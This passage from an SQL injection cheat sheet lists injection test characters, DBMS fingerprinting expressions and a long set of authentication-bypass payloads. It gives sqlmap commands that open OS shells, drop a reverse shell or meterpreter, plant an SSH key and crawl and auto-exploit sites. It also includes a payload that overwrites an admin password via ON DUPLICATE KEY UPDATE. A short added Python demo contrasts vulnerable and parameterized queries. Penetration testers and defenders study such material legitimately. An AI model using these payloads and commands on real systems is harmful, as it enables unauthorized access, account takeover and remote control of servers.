- Custom injection in UserAgent/Header/Referer/Cookie
- Second order injection
- Shell
- Crawl a website with SQLmap and auto-exploit
- Using TOR with SQLmap
- Using a proxy with SQLmap
- Using Chrome cookie and a Proxy
- Using suffix to tamper the injection
- General tamper option and tamper's list
- SQLmap without SQL injection
- Authentication bypass
- Authentication Bypass (Raw MD5 SHA1)
- Polyglot injection
- Routed injection
- Insert Statement - ON DUPLICATE KEY UPDATE
- WAF Bypass
## Entry point detection

Detection of an SQL injection entry point.

### Simple characters

```
'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
'  # required for XML content
```
### Multiple encoding

```
%%2727
%25%27
```
### Merging characters

```
`+HERP
'||'DERP
'+'herp
' 'DERP
'%20'HERP
'%2B'HERP
```
### Logic testing

```
page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
page.asp?id=1" or 1=1 -- true
page.asp?id=1 and 1=2 -- false
```
### Weird characters

```
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (')
```
### DBMS identification

Each entry pairs a boolean expression that evaluates true only on the named DBMS with that DBMS, so the backend can be fingerprinted from which expression keeps the page "true".

```
["conv('a',16,2)=conv('a',16,2)","MYSQL"],
["connection_id()=connection_id()","MYSQL"],
["crc32('MySQL')=crc32('MySQL')","MYSQL"],
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)","MSSQL"],
["@@CONNECTIONS>0","MSSQL"],
["@@CONNECTIONS=@@CONNECTIONS","MSSQL"],
["@@CPU_BUSY=@@CPU_BUSY","MSSQL"],
["USER_ID(1)=USER_ID(1)","MSSQL"],
["ROWNUM=ROWNUM","ORACLE"],
["RAWTOHEX('AB')=RAWTOHEX('AB')","ORACLE"],
["LNNVL(0=123)","ORACLE"],
["5::int=5","POSTGRESQL"],
["5::integer=5","POSTGRESQL"],
["pg_client_encoding()=pg_client_encoding()","POSTGRESQL"],
["get_current_ts_config()=get_current_ts_config()","POSTGRESQL"],
["quote_literal(42.5)=quote_literal(42.5)","POSTGRESQL"],
["current_database()=current_database()","POSTGRESQL"],
["sqlite_version()=sqlite_version()","SQLITE"],
["last_insert_rowid()>1","SQLITE"],
["last_insert_rowid()=last_insert_rowid()","SQLITE"],
["val(cvar(1))=1","MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0","MSACCESS"],
["cdbl(1)=cdbl(1)","MSACCESS"],
["1337=1337","MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'","MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
```
### Custom injection in UserAgent/Header/Referer/Cookie

```
python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" --headers="x-forwarded-for:127.0.0.1*"
```

The injection point is marked by the `*`.
### Second order injection

```
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt --dbms MySQL --second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" --dbs
```
### Shell

SQL shell:

```
python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell
```

Simple shell:

```
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
```

Dropping a reverse shell / meterpreter:

```
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
```

SSH shell by dropping an SSH key:

```
python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/
```
### Crawl a website with SQLmap and auto-exploit

```
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
```

- `--batch`: non-interactive mode; sqlmap would normally ask you questions, and this accepts the default answers
- `--crawl`: how deep you want to crawl the site
- `--forms`: parse and test forms
## Authentication bypass

```
'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--'/"--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
'or'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin'--
admin' -- -
admin' #
admin'/*
admin'or'2'LIKE'1
admin'or2LIKE2--
admin' or 2 LIKE 2#
admin') or2LIKE2#
admin') or 2 LIKE 2--
admin') or ('2'LIKE'2
admin') or ('2'LIKE'2'#
admin') or ('2' LIKE '2'/*
admin'or'1'='1
admin'or'1'='1'--
admin' or '1'='1'#
admin'or'1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin';-- azer
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
```
## Authentication bypass (raw MD5 / SHA1)

When the raw (binary) MD5 digest is used, the password is placed into the query as a plain string rather than as a hex string.
## Polyglot injection

```
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/

/* MySQL only */
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
```
## Routed injection

```
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```
## Insert Statement - ON DUPLICATE KEY UPDATE

The ON DUPLICATE KEY UPDATE clause tells MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by injecting the following payload into the email field:

```
attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
```

The query would look like this:

```sql
INSERT INTO users (email, password) VALUES ("attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- ", "bcrypt_hash_of_your_password_input");
```

This query will insert a row for the user "attacker_dummy@example.com". It will also try to insert a row for the user "admin@example.com".

Because that row already exists, the ON DUPLICATE KEY UPDATE clause tells MySQL to update the `password` column of the existing row to "bcrypt_hash_of_qwerty".

After this, we can simply authenticate with "admin@example.com" and the password "qwerty"!
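To make the defect concrete, here is an added Python/SQLite demo (not code from the original page): the e-mail payload above is fed once into a string-concatenated INSERT and once into a parameterized INSERT, and only the concatenated one overwrites the admin row. It assumes SQLite's `ON CONFLICT ... DO UPDATE` upsert as the stand-in for MySQL's ON DUPLICATE KEY UPDATE, single-quoted literals instead of the text's double quotes, and placeholder strings in place of real bcrypt hashes.

```python
import sqlite3

# Constructed demo, not the page's code: SQLite's "ON CONFLICT ... DO UPDATE"
# replaces MySQL's "ON DUPLICATE KEY UPDATE"; hash values are placeholders.
ADMIN_HASH = "bcrypt_hash_of_admin_secret"
ATTACKER_HASH = "bcrypt_hash_of_qwerty"

# The e-mail field value from the text, rewritten for the SQLite dialect.
PAYLOAD_EMAIL = (
    "attacker_dummy@example.com', '" + ATTACKER_HASH + "'), "
    "('admin@example.com', '" + ATTACKER_HASH + "') "
    "ON CONFLICT(email) DO UPDATE SET password=excluded.password -- "
)


def fresh_db() -> sqlite3.Connection:
    """In-memory users table with one pre-existing admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT PRIMARY KEY, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin@example.com", ADMIN_HASH))
    return conn


def register_vulnerable(conn, email: str, pw_hash: str) -> None:
    """String concatenation: the e-mail value becomes part of the SQL text."""
    conn.execute(f"INSERT INTO users (email, password) VALUES ('{email}', '{pw_hash}')")


def register_safe(conn, email: str, pw_hash: str) -> None:
    """Bound parameters: the e-mail value is data and is never parsed as SQL."""
    conn.execute("INSERT INTO users (email, password) VALUES (?, ?)", (email, pw_hash))


def admin_password(conn) -> str:
    return conn.execute(
        "SELECT password FROM users WHERE email = 'admin@example.com'").fetchone()[0]


def run_demo() -> dict:
    """Register the payload both ways and report what happened to the admin row."""
    vuln, safe = fresh_db(), fresh_db()
    register_vulnerable(vuln, PAYLOAD_EMAIL, "bcrypt_hash_of_your_password_input")
    register_safe(safe, PAYLOAD_EMAIL, "bcrypt_hash_of_your_password_input")
    return {
        "vulnerable_admin_hash": admin_password(vuln),  # overwritten by the upsert
        "safe_admin_hash": admin_password(safe),        # untouched
        "safe_stored_email": safe.execute(              # payload stored as a literal
            "SELECT email FROM users WHERE email != 'admin@example.com'").fetchone()[0],
    }


if __name__ == "__main__":
    print(run_demo())
```

The parameterized path stores the entire payload as an (odd-looking) e-mail address, which is also what an input-validation log should show if it is ever reached.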
## WAF Bypass

### White space alternatives

No space (%20) - bypass using whitespace alternatives